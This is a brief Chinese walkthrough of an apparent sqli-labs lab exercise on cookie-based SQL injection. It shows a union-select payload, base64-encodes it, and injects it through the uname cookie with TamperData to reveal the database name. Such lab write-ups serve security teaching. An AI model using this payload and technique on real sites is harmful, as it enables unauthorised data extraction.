Lesson - 21
POST -Cookie Injection - base64 encoded-single quoters and parenthesis
该网页的框架和上节类似,只不过在setcookie时对cookie进行base64_encode:
if(!isset($_COOKIE['uname']))
{
//声明实现过滤函数check_input
function check_input($value)
{
......
}
//对username,password进行验证登陆
//如果username,password匹配,setcookie
//重新载入当前页面
}
else
{
if(!isset($_POST['submit']))
{
//输出各种信息。
}
else
{
//删除cookie,重新载入当前界面
}
}
对SQL注入语句: ')union select 1,2,database()#
进行base64_encode:
Jyl1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
用TamperData对Cookie进行修改:
uname=Jyl1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
结果如图所示:
得到数据库为security